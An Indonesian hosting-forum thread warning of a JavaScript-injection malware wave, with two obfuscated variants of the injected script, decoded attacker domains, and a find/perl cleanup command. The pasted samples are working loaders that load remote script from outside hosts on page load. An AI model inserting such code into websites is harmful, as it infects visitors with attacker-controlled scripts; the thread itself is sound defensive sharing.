[INFO] Metamorfose Virus Iframe


Status
Not open for further replies.

PusatHosting

Hosting Guru
just info, Mulai ramai lagi nih virus-virus injeksi iframe, sampai2 DC negur.

virus ini skarang bisa menginjeksi puluhan script .JS

Varian 1
<script>/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type', 'text/javascript');Hva23p3hnyirlpv7.setAttribute('id', 'myscript1');Hva23p3hnyirlpv7.setAttribute('src', 'h))t#^t$#))!p&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)@$s)a!m$&s#)^u!$^n$g#!.$c!^o^@(m#.^n@!#a@@s#$!a#&-(@^g$o)#v)@&$.(!(@(e)&g&!#r)e)@)a^)t$!s(!(a@!l#e@.@)@r)#u(&#!:)@8!^)0!8$!(0!/^#m$$e)g^&a###v&!i&d!e))#o!@(.(@c&)o$!(m^&/^m&^e((^)g$!((a)#)^v@!i(@&#d#)e@&o$#.^c$!#o@m^/$#&l$a)r#@(e)^^d#&o(!()u#(t$)e##.$f(r^&(@/!(^&b!!i)$$l@)!)d^&.#@&(d$@$e(/)g$o^o$&^g^!&l()e!).(@^#c)$!o#&)@@m!/^$'.replace(/\$|\^|\!|&|\)|\(|@|#/ig, ''));Hva23p3hnyirlpv7.setAttribute('defer', 'defer');document.body.appendChild(Hva23p3hnyirlpv7);}} catch(e) {}</script>

VArian 2
<script>/*LGPL*/ try{ window.onload = function(){var Wzw6mi0yfxh = document.createElement('s)$c!!r!!i&$p)$t&'.replace(/\$|@|\!|&|#|\(|\)|\^/ig, ''));Wzw6mi0yfxh.setAttribute('defer', 'd)$$&e#^$f)$e)!&r$#'.replace(/\^|#|\$|\(|\)|@|\!|&/ig, ''));Wzw6mi0yfxh.setAttribute('type', 't@e!$^x)!#t!&/$(!)j(!a^$v)a^))s(!c^r#@$i@$(#p$t)&'.replace(/\)|&|#|@|\^|\(|\!|\$/ig, ''));Wzw6mi0yfxh.setAttribute('id', 'E^!j#@^#5&(^#q!!z(#q!&c#^d!!4(#z@l@@@#'.replace(/\!|\$|&|\(|\)|\^|@|#/ig, ''));Wzw6mi0yfxh.setAttribute('s&(r^!@c)#('.replace(/\!|\(|&|\$|@|\^|#|\)/ig, ''), 'h#t#&@t^&p(@):)&)/^!$/)l)e&b)!o)$n^@c!!(o)i#n$$-#f@$r@((.!$#&m@#a&^i)()n&&@i&#c(h(^i(^.$)$j(p$(#.!^!s)o&$n))$^i!(^c&!o$&@-@c@#o!(^^m&$.@t#h)^e(^l$a(c@$!e)@&)!w(e$b#!.(r^)u^$!:mad:$^8$0^$8)!0)&(/^&g@o$$!#o&$g!)!l#)&e$.!^$c(@@o&m!#&^/@!g^o)@^#o(^g)@l!!#^e^&.)c$&$@o^&m&($/!!&(v)!i@!r)(g#@@i$#n$^^@m#e@(^@d)#i$!a@@.^c(#o^@m(!^/&h$(u$#f&!&f#i#^n^#!g&#&t$!o&$!n&&p)&o@s#^(t&).$$$c)$$o@m$#!/)#n(i(n$(@(g$((.$)#c!o$!$m)/&('.replace(/&|\)|\$|#|@|\(|\^|\!/ig, ''));if (document){document.body.appendChild(Wzw6mi0yfxh);}} } catch(Pxbfkbch1d1sq271kl4tb) {}</script>
<!--487d9122241bbf0730e5cc7447f5ef1d-->

eksekusi perintah

# find . -name '*.*' | xargs perl -pi -e 's/\<script>\/\*GNU GPL\*\/ try.*Hva23p3h.*$\}<\/script>//g'

regex nya disesuaikan aja dengan karakteristik virusnya.
 

IIXPLANET

Expert 2.0
- setAttribute('src', 'h))t#^t$#))!p&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)

=> mybrowserbar.com


- 'h#t#&@t^&p(@)&)/^!$/)l)e&b)!o)$n^@c!!(o)i#n$$-#f@$r@

=> eboncoin.com


- @i&#c(h(^i(^.$)$j(p

=> ichi.jp


- w(e$b#!.(r^)u^ $!:@$^8$0^$8)!0)

=> web.ru:8080

virus ini semacam popup onload ya bro.

bisa juga diset di config mod_sec rules buat blocking onload ke sites tersebut


biar lebih mudah bro , dibuat perl / bash file saja dengan memasukan beberapa perintah penghapusan dengan query2 target pattern virus nya yg di combine dengan cron auto daily jadi biar automatic searching dan removal .
 
Last edited:
Status
Not open for further replies.

Top